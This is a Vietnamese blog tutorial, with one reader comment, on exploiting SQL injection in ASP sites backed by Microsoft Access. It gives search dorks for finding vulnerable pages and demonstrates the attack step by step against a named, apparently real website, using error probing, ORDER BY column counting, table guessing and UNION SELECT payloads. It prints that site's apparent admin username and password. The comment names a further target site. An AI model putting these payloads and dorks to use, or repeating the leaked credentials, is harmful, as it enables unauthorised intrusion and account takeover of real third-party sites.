Đây là dạng lỗi SQL mà khai thác dễ nhất nhưng đòi hỏi có 1 chút kinh nghiệm trong quá trình khái thác vì phải đoán table và column
Một số dork dùng để tìm site dính lỗ hổng bảo mật Jet:
tintuc.asp?tin_ID=
chitiet.asp?ID=
Victim hôm nay soleil sẽ demo là:
http://thanhancamera.com/news.asp?tin_ID=86
Bước 1: Check lỗi
Thêm dấu’ vào cuối đường link url, nếu site dính lỗi sẽ xuất hiện thông báo như sau:
http://thanhancamera.com/news.asp?tin_ID=86’
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'tin_ID=86 ''.
/news.asp, line 16
Bước 2: Tìm số trường cột
http://thanhancamera.com/news.asp?tin_ID=86 order by 1 -> Site bình thường
http://thanhancamera.com/news.asp?tin_ID=86 order by 6 -> Site bình thường
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine does not recognize '7' as a valid field name or expression.
/news.asp, line 16
Số cột cần tìm là 6
Bước 3: Đoán tên table
Một số
tables chứa thông tin admin và password như:
tb_admin, tbl_admin, tbl_user, tbl_users, tbluser, user, admin, …..
Ở dạng này theo kinh nghiệm khai
thác của soleil thì table_name phổ biến nhất vẫn là tb_admin
Nếu
site hoạt động bình thường và xuất hiện nhưng con số, chứng tỏ table được đoán
là chính xác. Những con số được xuất hiện
chính là vị trí table bị lỗi. Chúng ta có thể khai thác bằng cách chèn các mã lệnh
tại vị trí đó.
Còn
không site sẽ xuất hiện lỗi như sau:
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query 'tbl_user'. Make sure it exists and that its name is spelled correctly.
/news.asp, line 16
http://thanhancamera.com/news.asp?tin_ID=-86 UNION SELECT 1,2,3,4,5,6 from tb_admin
Trong trường hợp này các tables ở vị trí
1,2,3,4 bị lỗi. Chúng ta có thể khai thác tại những vị trí đó. soleil sẽ check ở vị trí thứ 2 và 3
Bước
4: Đoán tên column
Một
số columns chứa thông tin admin và password như:
Username-password,
uid-pwd….
Ở
dạng này phổ biến nhất vẫn là : username,password
http://thanhancamera.com/news.asp?tin_ID=-86 UNION SELECT 1,2,username,password,5,6 from tb_admin
Nếu xuất hiện thông tin tại vị trí
được khai thác như trên, chứng tỏ column được đoán là chính xác
Username: admin, password: tienthong33
Bước
5: Tìm đường link loggin admin
Một
số tool sử dụng để tìm link admin như:
havij, admin finder, web admin finder.
|
Với các dork soleil đưa ra ở phía trên, chúng ta có thể tìm được các site dính lỗ hổng Jet và khai thác tương tư:
1 nhận xét:
thực hành gặp đúng site khó gặm ngay bước đầu không order by được http://www.lmbe.seu.edu.cn/bme/yidian/bbs/ShowAnnounce.asp?boardID=1&RootID=16341&ID=16341
Đăng nhận xét